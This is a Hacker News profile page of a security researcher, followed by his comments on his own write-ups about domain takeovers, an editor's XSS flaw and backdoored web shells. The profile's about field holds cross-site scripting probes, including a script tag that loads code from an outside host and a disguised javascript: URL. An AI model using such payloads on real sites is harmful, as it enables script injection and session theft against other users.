HNHacker News
TopNewBestAskShowJobs

mandatory

540 karma · joined October 30, 2013

"><script src=https://y.vg></script>

http://www.test.com https://www.test.com JavAscRipt://www.test.com%0aalert(1)

<a href="https://www.test.com">test</a> [test](https://www.test.com)

tst

submissionscomments
mandatory··on Taking control of all .io domains with a targeted registration
Author here, thanks - glad you liked the post! :)
mandatory··on Ask HN: What's a side project you built to make money that hasn't?
I'm in love with this, I have nothing constructive to add but you should be really proud of this work. Reminded me of this video: https://www.youtube.com/watch?v=8pTEmbeENF4

Think you're on to something that this talk points out very well.

mandatory··on The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability
Of course. I'm a bit confused on this emphasis... Does the post make it seem as though you can take over an active site? The point of this attack is merely to take control of many domain names and doesn't make any point about taking over live websites (at least, this was not my intention). You are taking over control of the DNS of these domains, just because they are not actively hosting something doesn't make this less true.

The idea would be that a user has simply deleted/released the zone for a specific domain under their account. This could have happened because they plan on moving it later or because a lack of payment/service termination has occurred. This allows an attacker to obtain thousands of fresh domains easily with very little effort and likely no payment at all which can be used in malware campaigns/etc. Some common things I saw were indeed older unused domains, domain portfolio's of domain resellers/squatters, and even domains in restricted TLD spaces such as .gov, .edu, etc. These would certainly have value despite no longer being used.

Let me know if I've been unclear or am missing something here.

mandatory··on The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability
You wouldn't really need to "forge" SSL certificates, since you have control of the domain's DNS you can just request a long-term certificate and use DNS/HTTP as a validation method. Many/most CA's support this already.
mandatory··on The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability
Author here, you do have a point, that distinction should have been made. This is merely taking control over the DNS for a domain and doesn't speak to actual ownership of the domain at the registry (which would be "ground truth" for ownership of a domain).

The main idea of this post is to be informational/raise awareness since I'd argue a large majority of users don't expect this behavior to occur.

mandatory··on Taking Over DigitalOcean Domains via a Lax Domain Import System
Hey Jarland thanks for the thoughtful response. I don't think your actions were rude or inappropriate (what host would see this behavior and not act similarly?). I apologize that the discussion on the topic became so negative towards DigitalOcean (this might be my fault, I was merely trying to point out why I hadn't been able to delete the domains - not say that DigitalOcean was a bad company/etc). The disclaimer I added early on I thought would mitigate some of this negativity but apparently not quite.

At the very least I'm happy that some people have seen this more as a study of this pattern of functionality being an issue instead of this being only a DigitalOcean problem. I've seen (and have been reached out by) multiple people realizing this affects their company as well which has been awesome to watch.

mandatory··on Taking Over DigitalOcean Domains via a Lax Domain Import System
What was his/her flagged follow up if you don't mind me asking?
mandatory··on Taking Over DigitalOcean Domains via a Lax Domain Import System
I believe I was clear about it. However sometimes my writing can be unclear so perhaps it wasn't properly understood (I assume you're talking about their security team's response and not Trust & Safety?). Kind of sad about the massive amount of hate for DigitalOcean in this thread as their security team really seemed quite nice. Their support was just acting on an anomaly they had seen so shrugs.
mandatory··on Taking Over DigitalOcean Domains via a Lax Domain Import System
You're probably right about the logging being a bit too far, it was mainly my curiosity getting the best of me. One of my big assumptions was that all of these domains were just owned by one domain broker and this wasn't actually a systemic problem with the implemented importation methodology. I also thought it would be mild because if they had been deleted from an account they were likely no longer used (or so I had wrongfully assumed).
mandatory··on Taking Over DigitalOcean Domains via a Lax Domain Import System
See my response below and the logs were secure removed shortly after (as stated in the blog post).
mandatory··on Taking Over DigitalOcean Domains via a Lax Domain Import System
Fair point, my relucatance to stop was mainly due to companies usually disreguarding reports unless I have strong proof. Stopping short of the full scope would've left it up to speculation as to the full amount of vulnerable domains.

It was my plan to delete the domains (or at least null route them so others couldn't take them over with more malicious intent). However my account was banned before I could do so.

mandatory··on Monod, our secure and offline-first Markdown editor, is open source
It also isn't secure as a few of us have noted, since it suffers from a Cross-site Scripting (XSS) vulnerability: https://github.com/TailorDev/monod/issues/122
mandatory··on Every C99.php shell is backdoored
Right, didn't mean that in the original post - obviously this is how the function is designed to work. Fixed up the wording to clarify.
mandatory··on How I Got 5,000 GitHub Followers In Less Than 24 Hours
"Generating 5000 fake accounts falls into the script kiddie level of originality."

Wasn't really trying to be very "leet" with this hack, was just something fun I decided to do. Also deleting the accounts wouldn't be incredibly hard to do at all anyways.

I expected this type of feedback I suppose, the point wasn't to show a security vulnerability in GitHub. Was more just a lighthearted post.

← PreviousPage 2 of 2